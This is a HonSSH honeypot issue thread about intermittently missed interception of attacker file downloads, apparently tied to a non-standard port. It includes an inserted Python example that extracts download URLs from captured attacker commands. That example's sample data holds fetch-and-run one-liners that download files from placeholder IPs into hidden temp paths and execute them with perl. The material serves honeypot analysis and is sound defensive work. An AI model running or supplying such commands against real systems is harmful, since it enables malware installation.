File download working intermittently
Closed this issue · 10 comments
What steps will reproduce the problem?
1. The attacker logs in and downloads a file.
What is the expected behavior?
All files that are downloaded to the honeypot are also downloaded by HonSSH.
What do you see instead?
Only some files are downloaded, others are not.
What version of the product are you using?
56dfab7e24f1
On what operating system?
OpenBSD 5.3/5.4
Please provide any additional information below.
This is the first time I've noticed this. Two files were downloaded to the
honeypot today; the only difference I can see between the two download events
is the port the attacker connects to on the malware hosting server,
HTTP on port 6666 in this case. If this is the case, it's not consistent either,
as HonSSH has managed to do this before.
Adding log, adv-log and tty. Enjoy! :)
Original issue reported on code.google.com by are.hans...@gmail.com
on 26 Mar 2014 at 10:32
Attachments:
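The report above suspects that the explicit port in the download URL (HTTP on 6666) is what separates the missed downloads from the intercepted one. The block below is an added example, not HonSSH's own code and not taken from the attached logs: it extracts download URLs from attacker command lines as a honeypot would see them, and contrasts a host-only URL pattern (which silently drops the port and path) with an extractor that splits compound commands and parses the URL properly. The sample commands, the downloader set and the separator handling are all constructed assumptions for the demonstration.

```python
"""Extract download URLs from attacker shell commands captured by an SSH
honeypot (added example; not HonSSH's code)."""
import re
import shlex
from urllib.parse import urlsplit

# Constructed sample session commands; not from the logs attached to the issue.
SAMPLE_COMMANDS = [
    "wget http://198.51.100.7/x/bot.pl -O /tmp/.x && perl /tmp/.x",
    "cd /tmp; wget http://203.0.113.9:6666/bins/irc.tgz; tar xzf irc.tgz",
    "curl -s -o /var/tmp/.s https://203.0.113.9:6666/s.sh",
    "uname -a; w; ls -la",
]

DOWNLOADERS = {"wget", "curl", "fetch"}          # assumed set of tools to watch
SEPARATORS = re.compile(r"\s*(?:&&|\|\||;|\||&)\s*")   # shell command separators
DEFAULT_PORTS = {"http": 80, "https": 443}

# Host-only pattern: the optional path group can only start with '/', so the
# match ends at the ':' of an explicit port and both port and path are lost.
NAIVE_URL = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s;&|'\"]*)?")


def naive_urls(command):
    """URLs as the host-only pattern sees them (demonstrates the failure)."""
    return [m.group(0) for m in NAIVE_URL.finditer(command)]


def split_commands(command):
    """Split a compound shell line into simple commands (argv lists)."""
    argvs = []
    for segment in SEPARATORS.split(command):
        if not segment:
            continue
        try:
            argv = shlex.split(segment)
        except ValueError:            # unbalanced quote: fall back to whitespace
            argv = segment.split()
        if argv:
            argvs.append(argv)
    return argvs


def extract_downloads(command):
    """Return (url, host, port, path) for each URL handed to a downloader.

    The port is taken from the URL when present, otherwise from the scheme,
    so http://host:6666/file is fetched from 6666 rather than from port 80.
    """
    found = []
    for argv in split_commands(command):
        if argv[0].rsplit("/", 1)[-1] not in DOWNLOADERS:
            continue
        for arg in argv[1:]:
            parts = urlsplit(arg)
            scheme = parts.scheme.lower()
            if scheme not in DEFAULT_PORTS or not parts.hostname:
                continue
            try:
                port = parts.port or DEFAULT_PORTS[scheme]
            except ValueError:        # non-numeric port: not a fetchable URL
                continue
            found.append((arg, parts.hostname, port, parts.path or "/"))
    return found


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(cmd)
        print("  naive :", naive_urls(cmd))
        print("  parsed:", extract_downloads(cmd))
```

Run against the second sample, the naive pattern returns only `http://203.0.113.9`, which a fetcher would request on port 80 and fail; the parsed form carries port 6666 and the full path. Whatever HonSSH actually matched at revision 56dfab7e24f1, this is the class of discrepancy worth checking first when only downloads from non-standard ports go missing.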
Original comment by tnn...@googlemail.com
on 26 Mar 2014 at 10:36
- Changed state: Accepted
Bit worried about your .log file being so empty!
Original comment by tnn...@googlemail.com
on 26 Mar 2014 at 10:43
Yep, that is a bit concerning.
Original comment by are.hans...@gmail.com
on 26 Mar 2014 at 10:44
Just looking into this and got a bit confused.
So the attacker downloads two files and honssh did not download any?
Original comment by tnn...@googlemail.com
on 30 Mar 2014 at 1:44
As I recall, the attacker downloaded two files, but HonSSH did not intercept any
of them in this instance. It was able to intercept another file earlier the
same day.
Don't have access to the machine at the moment; I'll dig out some more info for you if you
like.
Original comment by are.hans...@gmail.com
on 30 Mar 2014 at 1:50
Hmmm ok I understand :D
I just pasted the command into my test setup and it seems to catch and download
it correctly.
Any chance the firewall on the HonSSH box blocked port 6666 outbound (even when
locally generated)?
Original comment by tnn...@googlemail.com
on 30 Mar 2014 at 1:56
Hmmm... it's allowing tcp/6660-6669 from the honeynet.
It shouldn't block HonSSH from fetching files on the external interface, if
that was the case I wouldn't see any downloads at all I think.
Sent from my Nokia 3310.
Original comment by are.hans...@gmail.com
on 30 Mar 2014 at 2:02
Ah yeah, that's true. I'll keep thinking.
Original comment by tnn...@googlemail.com
on 30 Mar 2014 at 2:04
Original comment by tnn...@googlemail.com
on 5 Apr 2014 at 4:37
- Changed state: Started
Hopefully it will catch all now. Raise another issue if not :)
Original comment by tnn...@googlemail.com
on 6 Apr 2014 at 2:40
- Changed state: Fixed